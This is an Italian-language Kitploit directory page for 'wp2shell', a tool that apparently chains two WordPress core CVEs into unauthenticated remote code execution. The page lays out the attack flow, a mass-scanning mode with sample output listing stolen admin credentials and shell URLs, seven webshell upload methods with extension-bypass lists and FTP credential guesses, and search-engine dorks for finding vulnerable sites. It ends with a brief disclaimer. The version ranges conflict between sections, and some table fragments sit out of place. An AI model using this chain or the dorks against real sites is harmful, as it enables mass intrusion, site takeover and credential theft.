Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/anggatechi/cve-2026-63030
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration Testing
GitHubanggatechi/cve-2026-63030

CVE-2026-63030

RCE pre-autenticazione nel core di WordPress — Batch Route Confusion + SQL Injection

Vedi Repository
12 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
CVE-2026-63030 — RCE pre-autenticazione nel core di WordPress — Batch Route Confusion + SQL Injection | Kitploit

wp2shell — RCE pre-autenticazione nel core di WordPress

CVE-2026-63030 (Confusione di route batch) + CVE-2026-60137 (Iniezione SQL)

Toolkit di sfruttamento a zero dipendenze per la catena di vulnerabilità wp2shell nel core di WordPress. Una singola richiesta HTTP anonima consente di ottenere l'esecuzione di codice remoto su un'installazione WordPress predefinita, senza richiedere plugin.


📋 Sommario

  • Versioni interessate
  • Flusso di sfruttamento
  • Avvio rapido
  • Demo
  • Funzionalità
  • Metodi di upload
  • File di output
  • Dork / Ricerca
  • Riferimenti
  • Avvertenze

🎯 Versioni interessate

IntervalloImpattoCorretto in
7.0.0 – 7.0.1RCE completa7.0.2

Nessun plugin o configurazione speciale richiesto. Un'installazione WordPress spoglia è sfruttabile.


🔗 Flusso di sfruttamento

root@kitploit:~
┌─────────────────────────────────────┐
│  ANONYMOUS HTTP REQUEST             │
│  POST /?rest_route=/batch/v1        │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-63030: Batch Desync       │
│  Malformed path → WP_Error →        │
│  Array misalignment → Auth Bypass   │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-60137: SQL Injection      │
│  author__not_in → unsanitized →     │
│  UNION SELECT extraction            │
└────────────────┬────────────────────┘
                 │
     ┌───────────┼───────────┐
     │           │           │
┌────▼────┐ ┌───▼────┐ ┌───▼──────────┐
│ oEmbed  │ │ Blind  │ │ Changeset    │
│ Seeding │ │ SQLi   │ │ Re-entrancy  │
│ Write   │ │ Read   │ │ Escalation   │
│ Cache   │ │ IDs    │ │ → Admin User │
└────┬────┘ └───┬────┘ └───┬──────────┘
     │           │           │
     └───────────┼───────────┘
                 │
┌────────────────▼────────────────────┐
│  ADMIN CREATED (pre-auth!)          │
│  → Login → Upload Shell (7 methods) │
└─────────────────────────────────────┘

🚀 Avvio rapido

root@kitploit:~
pip install requests
python exploit.py
root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  WP2SHELL — WordPress Core Pre-Auth RCE Exploit              ║
║  CVE-2026-63030 (Batch Route Confusion) + CVE-2026-60137    ║
║  Affected: WP 6.9.0 – 7.0.1  |  Fixed: 6.9.5 / 7.0.2       ║
╚══════════════════════════════════════════════════════════════╝

  [?] Target [url/list.txt] > list.txt
  [?] Threads [15] > 15

Singolo target

root@kitploit:~
python exploit.py
root@kitploit:~
  [?] Target [url/list.txt] > https://vulnerable-site.com

  ┌────────────────────────────────────────────────────────┐
  │                    SCAN CONFIGURATION                   │
  ├────────────────────────────────────────────────────────┤
  │  Targets : 1       Threads  : 1      Dir  : wp_core_rce│
  └────────────────────────────────────────────────────────┘

  ┌────────────────────────────────────────────────────────┐
  │  EXPLOIT SUCCESS                                       │
  ├────────────────────────────────────────────────────────┤
  │  Method : direct-plugin                                │
  │  Shell  : https://target.com/wp-content/plugins/...  │
  │  Login  : https://target.com/wp-login.php              │
  │  User   : wp2s_abc123def                               │
  │  Pass   : WP2S!xxxxxxxxxxxxxxxx                        │
  └────────────────────────────────────────────────────────┘

Scansione di massa

root@kitploit:~
python exploit.py
root@kitploit:~
┌────────────────────────────────────────────────────────┐
│                    SCAN CONFIGURATION                   │
├────────────────────────────────────────────────────────┤
│  Targets : 500    Threads  : 15     Dir  : wp_core_rce │
└────────────────────────────────────────────────────────┘
┌────────────┬────────────────────────────────────────┬──────────────┐
│            │                                        │              │
│  #/TOTAL   │ HOST                                   │ STATUS       │
├────────────┼────────────────────────────────────────┼──────────────┤
│    1/500   │ vulnerable-site.com                    │ SHELL        │
│            │   ↳ direct-plugin → https://vulnerabl...             │
│    2/500   │ target2.com                            │ ADM          │
│    3/500   │ safe-site.org                          │ SQLi         │
│    4/500   │ nope.com                               │ NO           │
│    5/500   │ jackpot.net                            │ SHELL        │
│            │   ↳ theme-editor → https://jackpot.ne...              │
└────────────┴────────────────────────────────────────┴──────────────┘
┌────────────────────────────────────────────────────────┐
│  SHELL     2   ADMIN    3   SQLi   15   TOTAL    50/500│
└────────────────────────────────────────────────────────┘
├────────────────────────────────────────────────────────┤
│  result.txt         │  admin credentials               │
│  result_upload.txt  │  shell upload URLs               │
│  log/scanned.txt    │  scanned hosts                   │
└────────────────────────────────────────────────────────┘

✨ Funzionalità

  • Zero dipendenze — solo libreria standard Python 3.11+ (requests solo per l'expander)
  • Multi-thread — 15 thread predefiniti, fino a 30
  • Ripresa automatica — log/scanned.txt salta i target già scansionati
  • Modalità batch silenziosa — output tabellare pulito, nessuno spam nei log
  • Rilevamento automatico — controlli di disponibilità per WordPress + API batch + SQLi
  • 7 metodi di upload paralleli — condizione di gara "first-win" (vince il primo)

📤 Metodi di upload

Tutti i 7 metodi vengono eseguiti in parallelo tramite ThreadPoolExecutor. Il primo metodo che ha successo vince e gli altri vengono annullati.

Estensioni per il media upload: .phtml .php5 .php7 .php8 .pht .phar .shtml .php4 .phps .phtm .Php5 .PhP5 .pHtml .phP .PHP

Credenziali FTP tentate: localhost / 127.0.0.1 con root / www-data / credenziali admin di WordPress


📁 File di output

FileContenuto
result.txtCredenziali admin: url.com/wp-login.php:user:pass
result_upload.txtURL delle shell: shell_url | login_url:user:pass | method

🔍 Dork / Ricerca

Shodan

root@kitploit:~
http.title:"WordPress"
http.component:"WordPress"

Fofa

root@kitploit:~
app="WordPress"
body="wp-json"
body="/batch/v1"

ZoomEye

root@kitploit:~
app:"WordPress"
"/wp-json/batch/v1"

Censys

root@kitploit:~
services.http.response.body:"/wp-json/batch/v1"

📚 Riferimenti

  • Advisory di Searchlight Cyber
  • Blog tecnico di Hadrian
  • Rilascio di WordPress 7.0.2
  • Ricerca di Assetnote
  • Threat Intel di Wordfence

⚠️ Avvertenze

Questo strumento è fornito esclusivamente per ricerca sulla sicurezza autorizzata e test di penetrazione. Utilizzalo solo su sistemi che possiedi o per cui hai esplicita autorizzazione scritta al test. Gli autori non si assumono alcuna responsabilità per un uso improprio.


📄 Licenza

Licenza MIT. Consulta LICENSE per i dettagli.

Scarica lo strumento
6.9.0 – 6.9.4
RCE completa
6.9.5
6.8.0 – 6.8.5Solo SQLi6.8.6
#MetodoDescrizione
1direct-pluginCarica zip tramite /wp-admin/plugin-install.php
2direct-themeCarica zip tramite /wp-admin/theme-install.php
3rest-apiInvia zip in POST a /wp-json/wp/v2/plugins con cookie di autenticazione
4plugin-editorScrive PHP direttamente tramite /wp-admin/plugin-editor.php
5theme-editorScrive PHP nella directory del tema attivo
6ftp-bypassInvia le credenziali FTP quando WordPress le richiede
7media-uploadCarica PHP tramite la libreria media con 15 varianti di estensione
log/scanned.txt
Tutti gli host scansionati (salto automatico al nuovo avvio)